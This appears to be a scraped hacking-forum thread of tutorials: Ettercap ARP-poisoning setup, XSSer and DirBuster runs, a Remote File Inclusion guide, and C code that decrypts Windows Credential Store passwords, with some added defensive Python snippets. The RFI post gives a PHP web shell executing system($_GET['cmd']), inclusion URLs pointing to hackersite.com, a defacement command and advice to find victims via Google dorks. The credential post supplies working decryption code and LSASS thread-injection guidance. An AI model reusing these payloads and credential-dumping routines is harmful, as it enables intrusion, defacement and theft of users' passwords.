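    put32(buf, opt + 16, 0x27F00);              /* AddressOfEntryPoint: near the end of UPX1 */
    struct { const char *name; uint32_t vsize, va, raw; } s[3] = {
        { "UPX0",  0x1F000, 0x1000,  0      },
        { "UPX1",  0x8000,  0x20000, 0x7A00 },
        { ".rsrc", 0x1000,  0x28000, 0x0400 },
    };
    for (int i = 0; i < 3; i++) {
        size_t sh = shdr + (size_t)i * 40;
        memcpy(buf + sh, s[i].name, strlen(s[i].name));
        put32(buf, sh + 8, s[i].vsize);
        put32(buf, sh + 12, s[i].va);
        put32(buf, sh + 16, s[i].raw);
    }
    return need;
}

int main(void) {
    uint8_t img[1024];
    size_t n = build_sample_upx_image(img, sizeof img);
    pe_pack_report r;
    if (!inspect_pe(img, n, &r)) { puts("not a PE image"); return 1; }
    printf("sections=%d entry=0x%X in section %d, UPX names=%d, first section virtual-only=%d -> %s\n",
           r.num_sections, r.entry_rva, r.entry_section, r.upx_section_names,
           r.first_section_virtual_only, looks_upx_packed(&r) ? "looks UPX-packed" : "no UPX pattern");
    return 0;
}
```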
  10. Author: Dangwal

Introduction

Ettercap is one of the best sniffing tools available today, but when it comes to using it on non-security distros on which it is not pre-configured for use, like Fedora, you might land in some problems like me. It all started on a sunny day when I actually thought to try it on Fedora Linux. PS: I won't be covering ncurses as it's quite easy & offers little to no hassles in operation; strangely, it gave me no errors in operation.

Installation of Ettercap

Anyway.. I installed ettercap by typing:

      [root@zion xero]# su
      Password:
      [root@zion xero]# yum install ettercap

or

      [root@zion xero]# yum install ettercap-gui

( I actually had problems with this one.. )

Yum resolved dependencies & installed it. I ran it on my local LAN network, assuming to run it on the default configuration.

      [root@zion xero]# ettercap -T -Q -M ARP //192.168.1.3

It successfully captured all the packets & I was able to get details about capturing. The real problems started when I started to run it in GUI mode.

      [root@zion xero]# ettercap -G

Playing Cat & Mouse with Ettercap

On launch, the GTK GUI popped up & prompted me for the stuff. I quickly pressed shift + U to choose the network interface (in this case my local LAN network hooked up to my roommates' laptops), & chose 'eth0', the default Ethernet interface. I went ahead by scanning for hosts by pressing "ctrl + s" & bam.. it crashed.

      ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
      Ooops ! This shouldn't happen...
      Segmentation Fault...
      Please recompile in debug mode, reproduce the bug and send a bugreport

okay.. I got it.. it might be crashing because it has not been updated in a long time. Ah well, I compromised by scanning partially for hosts & then running it. Again, I chose the host, added it to my target, mitm & started ARP poisoning (using the menu) & then started with unified sniffing. I got nothing.
Realizing it was not BackTrack, I sensibly closed it (re-ARPing the network.. not by deliberately closing it like Windows users do by abusing the [X] button) & opened etter.conf

      [root@zion xero]# vi /etc/etter.conf

& uncommented the iptables option to look like this

      # if you use iptables:
      redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
      redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

saved it, ran it again. Again, the same drill: partial host scanning, target selection, mitm, ARPing, sniffing. Bang, I got nothing.. again. I looked at the console output & found:

      [root@zion xero]# ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
      iptables v1.3.3: can't initialize iptables table `nat': Permission denied (you must be root)
      Perhaps iptables or your kernel needs to be upgraded.

wow.. I am running the program as root, edited the read-only file as root & all I got was to upgrade my kernel? bullshit! Anyway.. back to etter.conf, this time I changed the privileges to 0

      [privs]
      ec_uid = 0 # nobody is the default
      ec_gid = 0 # nobody is the default

The program ran & the error went away, but still.. I was unable to capture anything in GUI mode; guess the more user friendly you make it, the more hassles you add with it... sheesh. I was into new stuff: after about 10 minutes of waiting I got this:

      SEND L3 ERROR: 44 byte packet (0800:06) destined to 192.168.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)

Great... now this was what I was talking about. Now this really got me moving. It's not like every day when you can target a network in CUI using one command of a program, but using a GUI has a lot of strings attached. Now I did everything very carefully; although I was still not able to figure out the real reason for the "Segmentation Fault" problem, I guess everything works fine if you do it like this?
- Configure etter.conf like I stated above: set uid to 0 & uncomment the iptables section.
- Run ettercap using kdesu; yep, ran it with elevated privileges in the KDE environment to avoid the "can't initialize iptables" error.

      [root@zion xero]# kdesu ettercap -G

- Give your password, & choose the network interface (shift + U).
- Once done, please be patient, open a new terminal window, change to root & type this command (forwards packets, avoids the error):

      [root@zion xero]# echo "1" > /proc/sys/net/ipv4/ip_forward

It will avoid the "SEND L3 ERROR".

Finally Cat gets Mouse!

Once done, do your drill & you will "finally" be able to capture data using the GUI. For the rest of the elites out there, I guess

      [root@zion xero]# ettercap -T -Q -M arp:remote -i eth0 /192.168.1.3/ //

seems to work, man... What a trip... I would choose Wireshark over it any day...

Conclusion

If you have ever got into problems while trying to run Ettercap on your Linux box, then this guide will help you get rid of some of those nasty errors and let you sail smoothly.
  11. Author: Punter

About XSSer Tool

XSSer http://xsser.sourceforge.net/ is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections in any website. In this introductory article I will show you how easy it is to use XSSer for detection and exploitation of XSS in a vulnerable website.

In action with XSSer

Here we will experiment with this tool on the following test vulnerable website, acuforum forums. Below are simple steps on using XSSer.

    root@punter:/pentest/web# svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
    root@punter:/pentest/web# cd xsser
    root@punter:/pentest/web/xsser# python XSSer.py -u 'http://testasp.vulnweb.com' -g 'Search.asp?tfSearch=' -proxy 'http://127.0.0.1:8118' -referer '666.666.666.666' -user-agent 'correct audit' -Fuzz -s

XSSer Action Screenshots

After you execute the above sequence of commands you can see the results as shown in the sequence of screenshots below.

Screenshot 1: Testing the vulnerable website for XSS Injections using XSSer
Screenshot 2: Testing the vulnerable website for XSS Injections using XSSer [Continued]
Screenshot 3: Final results of the XSS Detection operation. You can see that XSSer has already found a couple of XSS flaws in our test website.

Exploitation of XSS Injections

In the above screenshot, the text marked in blue indicates the attack vector which can trigger XSS Injections on this website. Now we can go ahead and manually verify these injections, and it does not take long. Below is the screenshot showing successful exploitation of a detected XSS Injection.

Conclusion

This article shows how easy it is to use the XSSer tool to detect those hidden XSS flaws in any website using very simple steps. You can rest your brain for the time being while XSSer does all the job for you.

Download XSSer: http://xsser.sourceforge.net/
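As an added example (not part of Punter's article and not XSSer's own code), the Python below shows the defect XSSer is probing for on a search page like Search.asp?tfSearch=: a reflected parameter concatenated into HTML unescaped, beside the hardened form that HTML-escapes it, plus the marker-reflection check an application's own test suite can run so the regression is caught before a scanner finds it. The tfSearch parameter name is taken from the article; the page markup is made up.

```python
import html
from urllib.parse import parse_qs, urlencode


def _search_term(query_string: str) -> str:
    # parse_qs percent-decodes, so "%3Cscript%3E" arrives here as "<script>"
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get("tfSearch", [""])[0]


def render_search_vulnerable(query_string: str) -> str:
    # The user-controlled term is concatenated into the HTML unchanged, so a
    # value containing tags becomes markup the browser will execute.
    return f"<h1>Results for: {_search_term(query_string)}</h1>"


def render_search_hardened(query_string: str) -> str:
    # Same page, but the term is HTML-escaped before it lands in element
    # content (quote=True also covers the attribute-value context).
    escaped = html.escape(_search_term(query_string), quote=True)
    return f"<h1>Results for: {escaped}</h1>"


# Constructed marker: contains the angle brackets an escaper must neutralise.
MARKER = "<xssmarker>"


def reflects_unescaped(render) -> bool:
    # Regression check: request the page with the marker and see whether it
    # comes back byte-for-byte (True means the parameter is reflected raw).
    query = urlencode({"tfSearch": MARKER})   # -> tfSearch=%3Cxssmarker%3E
    return MARKER in render(query)


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_search_vulnerable),
                     ("hardened", render_search_hardened)):
        print(f"{name}: reflects unescaped = {reflects_unescaped(fn)}")
```

The check is deliberately a plain reflection test rather than a payload list: if a marker with angle brackets survives unescaped, every payload built on those characters will too, so the test fails early and without depending on any particular vector.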
  12. Author: Punter

About DirBuster

DirBuster https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project is a multi threaded Java based application designed to brute force directory and file names on web/application servers. During web application pentesting, finding the sensitive directories, files and folders is always quite tough work. Nowadays we often don't see those default installation files/directories as in the olden days, and finding out the sensitive pages really gets challenging. In such cases, DirBuster helps in finding those unknown and sensitive file names and directories. This can prove to be great information to start with in a real web penetration test.

In action with DirBuster

Now I will be showing you how easy it is to use DirBuster to find those sensitive directories and files on webservers. Here, for the demo purpose, I will be using Mutillidae (http://www.owasp.org/index.php/Category:OWASP_Mutillidae): A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10.

Here are the steps to run DirBuster:

    1. cd /pentest/web/dirbuster
    2. root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/

Once you start DirBuster it will appear as shown in the screenshot below. Now browse and select the 'directory bruteforce lists' from the DirBuster folder (example: directory-list-1.0.txt) as shown below. Now press the start button and you will see DirBuster start bruteforcing the filenames & directories on the webserver as shown below. In the black window you can see all the filenames and directories discovered by DirBuster. One of the discovered files, '../passwords/accounts.txt', looks interesting. On opening you will see that it has the passwords related to webserver accounts.

Conclusion

Finding out those hidden files and directories on the webserver is a tedious task for anyone involved in web application pentesting. DirBuster makes that task much simpler and faster with its easy to use GUI interface. Even webserver owners can easily use this tool to remove any sensitive files/directories from their webservers, taking it one step further in securing their servers.
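The server-side view of a DirBuster run, as an added example that is not part of Punter's article and not DirBuster's own code: a few constructed Apache combined-format log lines (not real traffic; the 192.168.0.x addresses, the paths and the "DirBuster-0.12" user agent are assumed) and the detection logic a webserver owner would run over them. It flags any client that racks up a burst of 404s inside a short window, which is what a wordlist brute force looks like from the server, and lists what that client did get a 200 on, since that is the exposure to fix.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log in Apache combined format (not real traffic).
SAMPLE_LOG = """\
192.168.0.50 - - [10/Oct/2011:13:55:36 +0000] "GET /mutillidae/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Oct/2011:13:55:37 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.0.77 - - [10/Oct/2011:13:55:40 +0000] "GET /mutillidae/admin/ HTTP/1.1" 404 211 "-" "DirBuster-0.12"
192.168.0.77 - - [10/Oct/2011:13:55:40 +0000] "GET /mutillidae/backup/ HTTP/1.1" 404 211 "-" "DirBuster-0.12"
192.168.0.77 - - [10/Oct/2011:13:55:41 +0000] "GET /mutillidae/test/ HTTP/1.1" 404 211 "-" "DirBuster-0.12"
192.168.0.77 - - [10/Oct/2011:13:55:41 +0000] "GET /mutillidae/old/ HTTP/1.1" 404 211 "-" "DirBuster-0.12"
192.168.0.77 - - [10/Oct/2011:13:55:42 +0000] "GET /mutillidae/tmp/ HTTP/1.1" 404 211 "-" "DirBuster-0.12"
192.168.0.77 - - [10/Oct/2011:13:55:42 +0000] "GET /mutillidae/config/ HTTP/1.1" 404 211 "-" "DirBuster-0.12"
192.168.0.77 - - [10/Oct/2011:13:55:43 +0000] "GET /mutillidae/passwords/accounts.txt HTTP/1.1" 200 412 "-" "DirBuster-0.12"
192.168.0.50 - - [10/Oct/2011:13:56:02 +0000] "GET /mutillidae/index.php HTTP/1.1" 200 4981 "-" "Mozilla/5.0"
"""

# client, timestamp, method, path and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line: str):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_bruteforcers(lines, window_seconds=60, threshold=5):
    """Map client IP -> largest number of 404s it produced in any window.

    Only clients reaching `threshold` misses inside `window_seconds` are
    returned; a normal browser missing a favicon never gets there.
    """
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append(rec["ts"])

    flagged = {}
    window = timedelta(seconds=window_seconds)
    for ip, times in misses.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):          # sliding window over sorted misses
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def successful_paths(lines, ip):
    """Paths a given client fetched with a 2xx status: the guesses that hit."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["ip"] == ip and 200 <= rec["status"] < 300:
            hits.append(rec["path"])
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, count in find_bruteforcers(lines).items():
        print(f"{ip}: {count} misses in one window; hits: {successful_paths(lines, ip)}")
```

Thresholds are a tuning choice: a site with many dangling links will need a higher `threshold` or a shorter `window_seconds`, and a slow, throttled scan will need the reverse, so run it against a day of your own logs before trusting the numbers.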
  13. You say what you say, but he's actually right :)) Google Translate really does give Gigi Becali :)) PS: the unit of measurement for stupidity is???? == BECALU'
  14. Author: Rishabh Dangwal

RFI stands for Remote File Inclusion, which allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on the server or code execution on the website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability and trust me, all website hacking is not exactly about SQL injection. Using RFI you can literally deface websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one; some BASH might come in handy as most servers today are hosted on Linux.

Starting with RFI

Let's get it started. The first step is to find a vulnerable site; you can easily find them using Google dorks. If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use an automated tool to apply Google dorks using Google. Now let's assume we have found a vulnerable website:

    http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from the server and renders them as web pages. We can find ways around it as it uses the PHP include function to pull them out. Let's check it out.

    http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script "evilscript" in text format from my website, which contains some code. Now, if it's a vulnerable website, then any of these 3 things can happen:

Case 1 - You might have noticed that the url consisting of "page=home" had no extension, but I have included an extension in my url, hence the site may give an error like 'failure to include evilscript.txt.txt'; this might happen as the site may be automatically adding the .txt extension to the pages stored in the server.

Case 2 - In case it automatically appends something in the lines of .php, then we have to use a null byte '%00' in order to avoid the error.

Case 3 - Successful execution.

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloated but highly effective once deployed) or you might code yourself a new one. For this, knowledge of PHP might come in handy. Here we go:

    <?php
    echo "<script>alert(U 4r3 0wn3d !!);</script>";
    echo "Run command: ".htmlspecialchars($_GET['cmd']);
    system($_GET['cmd']);
    ?>

The above code allows you to exploit the include function and tests if the site is RFI (XSS) vulnerable by running the alert box code, and if successful, you can send custom commands to the Linux server in bash. So, if you are in luck and if it worked, let's try our hands on some Linux commands. For example, to find the current working directory of the server and then to list files, we will be using the 'pwd' and 'ls' commands:

    http://victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript
    http://victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as the cmd we put in our script and begins to print the working directory and list the documents. Even better, you can almost make the page proclaim that you hacked it by using the 'echo' command.

    cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it. In case it's a primitive website which stores pages with the .txt extension, you might want to put it along with the .txt files. Now as expected, we are the alpha and the omega of the website; we can download, remove, rename, anything! Want to download stuff? Try the 'wget' function... I leave the rest to your creativity!

Conclusion

In this basic tutorial, Rishabh explains the RFI vulnerability and how to play around with it.

Edit: I had been looking for a tutorial for a long time; I found one, and I'm sharing it with you.
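As an added example that is not Rishabh's code, the Python below reproduces the vulnerable include pattern from the tutorial (the page parameter with ".txt" appended, which is exactly what produces the 'evilscript.txt.txt' error in Case 1) beside the hardened form: a fixed allowlist of page names, plus a rejection classifier that names which of the tricks the tutorial describes (remote URL, the %00 null byte once URL-decoded, path traversal) was attempted, so the application can log it instead of including it. PAGES_DIR and ALLOWED_PAGES are assumed values for a site like the one in the tutorial.

```python
import posixpath
import re

PAGES_DIR = "/var/www/pages"                  # assumed: where the site's text pages live
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed: the site's real page names
NAME_RE = re.compile(r"^[a-z0-9_-]{1,32}$")   # a page name is a plain identifier, nothing else


def resolve_page_vulnerable(page: str) -> str:
    # Mirrors the include pattern in the tutorial: whatever arrives in ?page=
    # becomes the include target with ".txt" appended. A remote URL therefore
    # becomes "http://.../evilscript.txt.txt", the Case 1 error message.
    return page + ".txt"


def describe_rejection(page: str):
    """Return why a page value is refused, or None if it is acceptable.

    The value is assumed to be already URL-decoded, so a %00 from the query
    string shows up here as a literal NUL byte.
    """
    if "\x00" in page:
        return "null-byte"            # Case 2 trick: truncating the appended extension
    if "://" in page:
        return "remote-url"           # the inclusion from hackersite.com
    if ".." in page or "/" in page or "\\" in page:
        return "path-traversal"       # local file inclusion attempts
    if not NAME_RE.match(page) or page not in ALLOWED_PAGES:
        return "not-allowlisted"      # anything that is not a known page name
    return None


def resolve_page_hardened(page: str):
    # Only a name from the allowlist is ever turned into a path; the path is
    # built server-side from constants, never from the request.
    if describe_rejection(page) is not None:
        return None
    return posixpath.join(PAGES_DIR, page + ".txt")


if __name__ == "__main__":
    for value in ("home", "http://hackersite.com/evilscript.txt",
                  "http://hackersite.com/evilscript.txt\x00", "../../etc/passwd"):
        print(repr(value), "->", resolve_page_hardened(value), describe_rejection(value))
```

The allowlist is the actual control; the classifier only exists so the log line says "remote-url" rather than "bad request", which is what makes the attempts visible in monitoring.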
  15. About Network Password & Credential Store

Windows provides the 'Credential Store' framework to store network based passwords in a secure encrypted format. This provides a convenient and reliable mechanism to store the passwords for network logins so that the user doesn't have to enter the password every time while accessing network resources. Not only does Windows use it to store network authentication passwords, but other applications such as Outlook, Windows Live Messenger, Remote Desktop, GMail Notifier etc. use the same mechanism for storing their login passwords. Windows also allows applications to seamlessly manage this 'Credential Store' using Credential Management API functions such as CredEnumerate, CredRead, CredWrite, CredProtect, CredUnprotect, CredDelete etc.

Location of Credential Store

Windows 'Credential Store' keeps the user credentials in encrypted format at user specific locations. The storage mechanism is slightly different for XP and Vista/Win7 platforms.

For Windows XP

On Windows XP, the encrypted user credentials are stored in the hidden file called 'Credentials' inside both the APPDATA and LOCALAPPDATA locations mentioned below.

    APPDATA Location - C:\Documents and Settings\<username>\Application Data\Microsoft\Credentials\<user sid>\
    LOCALAPPDATA Location - C:\Documents and Settings\<username>\Local Settings\Application Data\Microsoft\Credentials\<user sid>\

For Vista & Windows 7

Vista onwards, the user credentials are stored in multiple files with random names (generated using a GUID) inside both the APPDATA and LOCALAPPDATA locations mentioned below. (There will be a separate credential file for each of the network accounts.)

    APPDATA Location - C:\Users\<username>\AppData\Roaming\Microsoft\Credentials\
    LOCALAPPDATA Location - C:\Users\<username>\AppData\Local\Microsoft\Credentials\

Based on the type of password and application, one of these locations is chosen to store the corresponding credential file. For example, Windows Live Messenger & Remote Desktop login passwords are stored at the LOCALAPPDATA location and all other types of passwords are stored at the APPDATA location. These credential files are hidden and not visible even if you have enabled 'show hidden files/folders' in the folder settings. To view these files, use the command prompt, navigate to the above locations and then issue the 'dir /a' command.

Each of these credential files begins with a standard signature at the beginning of the file which can be used for its verification. Here are the first 16 bytes representing the identity of such a credential file:

    0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01, 0x15, 0xD1, 0x11, 0x8C, 0x7A, 0x00, 0xC0

Types of Network Passwords

Windows 'Credential Store' supports different types of network passwords. Each type uses a different kind of encryption and storage mechanism. Also each type of password requires a different level of access privileges for decryption. Here are the primary types:

    Generic Password
    Domain Password
    Domain Visible Password / .NET Passport
    Certificates

'Domain Password' type provides the highest level of security as these passwords can only be managed by a specific system process called LSASS.exe. No other process, even if it is running as administrator, can decrypt such passwords. All network authentication, Remote Desktop and Outlook exchange server login passwords belong to this type.

'Generic Password' type is used to store all user specific credentials and only that user can decrypt such passwords. Internet Explorer (basic & digest authentication) and Windows Live Messenger use this method to store their login credentials.

'Domain Visible Password' is similar to the 'Generic Password' mechanism. However in the case of 'Generic Password' both username & password are encrypted, and for 'Domain Visible Password' only the password is encrypted. Also both types use a different salt as entropy for decryption of the password.
MSN Messenger 7.0 uses this method to store the login passwords with the name '.Net Passport'.

Recovering 'Generic Network' Passwords

Generic network passwords are user specific and can be decrypted only in the security context of the corresponding user. As mentioned earlier, the Windows Credential Management functions can be used to manage these passwords. Here is the sample code which demonstrates listing all the generic passwords and then decrypting them using the CryptUnprotectData function.

    void EnumerateGenericNetworkPassword()
    {
        DATA_BLOB DataIn;
        DATA_BLOB DataOut;
        DATA_BLOB OptionalEntropy;
        tmpSalt[37];
        char *strSalt={"abe2869f-9b47-4cd9-a358-c22904dba7f7"};
        char strURL[1024];
        char strCredentials[1024];
        char strUsername[1024];
        char strPassword[1024];

        //Create the entropy/salt required for decryption...
        for(int i=0; i< 37; i++)
            tmpSalt[i] = (short int)(strSalt[i] * 4);

        OptionalEntropy.pbData = (BYTE *)&tmpSalt;
        OptionalEntropy.cbData = 74;

        DWORD Count;
        PCREDENTIAL *Credential;

        //Now enumerate all http stored credentials....
        if(CredEnumerate(NULL,0,&Count,&Credential))
        {
            for(int i=0;i<Count;i++)
            {
                if( Credential[i]->Type == CRED_TYPE_GENERIC)
                {
                    DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob;
                    DataIn.cbData = Credential[i]->CredentialBlobSize;

                    if(CryptUnprotectData(&DataIn, NULL, &OptionalEntropy, NULL, NULL,0,&DataOut))
                    {
                        //Extract username & password from credentials (username:password)
                        sprintf_s(strCredentials, 1024, "%S", DataOut.pbData);
                        char *ptr = strchr(strCredentials, ':');
                        *ptr = '\0';
                        strcpy_s(strUsername, 1024, strCredentials);
                        ptr++;
                        strcpy_s(strPassword, 1024, ptr);

                        printf("Generic Network Password account details, Username=%s, Password=%s", strUsername, strPassword);
                    }
                }
            } // End of FOR loop

            CredFree(Credential);
        }
    } //End of function

The above code uses the CredEnumerate function to go through all the stored network password accounts for the current user.
Next it checks if the account type is CRED_TYPE_GENERIC. If a generic type of account is found then it decrypts the user credential data using the CryptUnprotectData function which is part of the Windows Crypto API package. Upon successful decryption it contains both username and password in clear text separated by semicolon.

Recovering 'Domain Visible Network' (.Net Passport) Passwords

This method uses a similar mechanism as the generic type to encrypt the password. The only difference is that here a different salt is used to encrypt/decrypt the credentials. Also in this case only the password is encrypted rather than both the username & password pair as in the case of the generic method. Here is the modified working code for decrypting this type of network password:

    void EnumerateDotNetPassportPassword()
    {
        DATA_BLOB DataIn;
        DATA_BLOB DataOut;
        DATA_BLOB OptionalEntropy;
        tmpSalt[37];
        char *strSalt={"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"};
        char strCredentials[1024];
        char strUsername[1024];
        char strPassword[1024];

        //Create the entropy/salt required for decryption...
        for(int i=0; i< 37; i++)
            tmpSalt[i] = (short int)(strSalt[i] * 4);

        OptionalEntropy.pbData = (BYTE *)&tmpSalt;
        OptionalEntropy.cbData = 74;

        DWORD Count;
        PCREDENTIAL *Credential;

        //Now enumerate all http stored credentials....
        if(CredEnumerate(NULL,0,&Count,&Credential))
        {
            for(int i=0;i<Count;i++)
            {
                if( Credential[i]->Type == CRED_TYPE_DOMAIN_VISIBLE_PASSWORD)
                {
                    DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob;
                    DataIn.cbData = Credential[i]->CredentialBlobSize;

                    sprintf_s(strUsername, 1024, "%S", Credential[i]->UserName);

                    if(CryptUnprotectData(&DataIn, NULL, &OptionalEntropy, NULL,NULL,0,&DataOut))
                    {
                        //Decrypted data contains password in clear text
                        sprintf_s(strPassword, 1024, "%S", DataOut.pbData);

                        printf(".Net Passport Account details, Username=%s, Password=%s", strUsername, strPassword);
                    }
                }
            } // End of FOR loop

            CredFree(Credential);
        }
    } //End of function

The above code uses the CredEnumerate function to go through all the stored network password accounts for the current user. Next it checks if the account type is CRED_TYPE_DOMAIN_VISIBLE_PASSWORD. If such an account is found then it decrypts the password data using the CryptUnprotectData function. Upon successful decryption it contains the password in clear text. This method is also termed '.Net Passport' because it is mainly used by MSN Messenger, which stores its login password with the name '.Net Passport'.

Recovering 'Domain Network' Passwords

The domain network password method uses a stricter technique for encrypting the credentials, thus providing better security over the other methods. Only the system process LSASS.EXE can encrypt or decrypt these kinds of passwords. LSASS is a Windows core system process responsible for enforcing security and executing various security oriented tasks. So in order to decrypt domain passwords one has to perform the decryption in the context of the LSASS process. This can be achieved by injecting a remote thread into the LSASS process using the CreateRemoteThread function. This is similar to the technique used by the pwdump tool to dump the LM/NTLM hashes for the user accounts on the system.
Once the thread is injected, it can use the special undocumented function LsaICryptUnprotectData exported from Lsasrv.dll to decrypt the credentials buffer. Here is the prototype of the function LsaICryptUnprotectData:

    typedef int (WINAPI *LPFUN_LSAICRYPTUNPROTECTDATA) (
        LPBYTE encCredData,
        DWORD encCredDataSize,
        DWORD reserved1,
        DWORD reserved2,
        DWORD reserved3,
        DWORD reserved4,
        DWORD dwFlags,
        DWORD reserved5,
        LPBYTE *decCredData,
        LPDWORD decCredDataSize
    );

This function takes the credential buffer (the credential file found in one of the store locations) & its size as input and returns the decrypted credential buffer. This decrypted buffer starts with a header whose structure is given below:

    struct DecryptedDataHeader
    {
        DWORD dwHeaderId;   //0x01 for XP & 0x30 for Vista/Win7
        DWORD dwBufferSize; //size of the entire decrypted data
    };

Here the first field contains the signature and the second field indicates the size of the entire decrypted buffer. After the header follows the network password structure for each of the stored accounts. This structure can represent any type of network password account and not just the domain password. However username & password are decrypted only for domain accounts, and for all other types the password is kept in encrypted format. The contents of this structure are given below. The internal fields of the structure vary slightly for Vista/Win7 from XP. Hence care needs to be taken while decoding this decrypted data on XP and Vista/Win7 platforms.

[Note: All the structure information presented below is derived from reverse engineering work. So things may slightly differ from the real stuff.]

For XP:

    // For Windows XP
    struct DecryptedNetAccount
    {
        DWORD dwItemSize;        //total size of this item for XP
        DWORD dwUnknown;
        DWORD dwType;
        DWORD dwFileTimeLowDate;
        DWORD dwFileTimeHighDate;
        DWORD dwZero;
        DWORD dwPersist;         //3 => enterprise 2=> local machine
        char  unknown[12];
        DWORD dwCredNameSize;
        char  strCredName[dwCredNameSize];
        DWORD dwCommentSize;
        char  strComment[dwCommentSize];
        DWORD dwAliasSize;
        char  strAlias[dwAliasSize];
        DWORD dwUserNameSize;
        char  strUserName[dwUserNameSize];
        DWORD dwPasswordSize;
        char  password[dwPasswordSize];
        char  padding[unknown];  //To make next entry aligned on 8th byte
    };

For Vista and Windows 7:

    // For Vista & Windows 7
    struct DecryptedNetAccountVista
    {
        DWORD dwZero;
        DWORD dwType;
        DWORD dwzero;
        DWORD dwFileTimeLowDate;
        DWORD dwFileTimeHighDate;
        DWORD dwSomeSize;
        DWORD dwPersist;         //3 => enterprise 2=> local machine
        char  unknown[12];
        DWORD dwCredNameSize;
        char  strCredName[dwCredNameSize];
        DWORD dwCommentSize;
        char  strComment[dwCommentSize];
        DWORD dwAliasSize;
        char  strAlias[dwAliasSize];
        DWORD dwUnknownSize;     // only for vista/win7
        char  strUnknown[dwUnknownSize]; //only for vista/win7
        DWORD dwUserNameSize;
        char  strUserName[dwUserNameSize];
        DWORD dwPasswordSize;
        char  password[dwPasswordSize];
    };

The above structure is of variable length and depends upon the length of the various text fields. Each of these text fields is a NULL terminated UNICODE string except the password field. Also at the end of each structure, extra padding bytes are added (on Windows XP only) so as to align the next entry on an 8 byte boundary. On the Vista/Windows 7 platform, only one network account is stored per credential file. Here is the sample code to decode this decrypted credential data and display the username/password information for all the stored domain password accounts.
    // Check for valid signature
    dwHeaderId = decDataBuffer->dwHeaderId
    if( dwHeaderId != 0x1 && dwHeaderId != 0x30 )
    {
        printf("\n Decrypted data is not valid, mismatch in the header");
        return;
    }

    //Set the index to first entry
    index = sizeof(DecryptedDataHeader);

    while( index < dwBufferSize )
    {
        DecryptedDataItem *decDataItem = (DecryptedDataItem*) &pDecData[index];

        if( decDataItem->index == CRED_TYPE_DOMAIN_PASSWORD )
        {
            printf("\n Network Name = %S", decDataItem->strCredName);

            //move index to username field and print it
            printf("\n Username = %S ", decDataItem->strUserName);

            //next move to password field and print it out...
            WideCharToMultiByte(CP_ACP, 0, decDataItem->strPassword, decDataItem->dwPasswordSize, strPassword, 1000, NULL, NULL );
            printf("\n Password = %s ", strPassword);
        }

        //move to next password entry for XP platform
        if( XP platform )
            index = index + decDataItem->dwItemSize
        else
            break; //for vista/win7 only one account per credential file is stored
    }

The above code first verifies whether the decrypted data is valid by comparing the signature bytes in the header. Next it loops through each structure of domain password type and prints the network name, username & password in clear text. Also note that the decrypted buffer from LsaICryptUnprotectData contains data for all types of network passwords, not just the domain type. But the password for the other types is still in encrypted format, which can be further decrypted using the same procedure as explained earlier for the respective types.

References:
Three Ways to Inject Your Code into Another Process - CodeProject
  16. I just made a similar thread, but for Safari.. now I'm starting on Firefox and IE. In the meantime, take a look at what I posted :D http://rstcenter.com/forum/36234-%5Bexposed%5Dapple-safari-password-secrets.rst#post245677 I'm not the author.
  17. Introduction

Safari is one of the top 5 browsers, known for the innovative look and feel reflected in every product of Apple! It offers one of the best ways to read online, greater support for HTML5, and other new features that make the web even better. Like other browsers, Safari also comes with a built-in password manager feature for securely storing and managing the user's web login passwords. This article is set to expose, in a first ever public disclosure, the password secrets of Safari, including the stored password location, the encryption algorithm and code for decryption of stored passwords!

Safari Password Storage Location

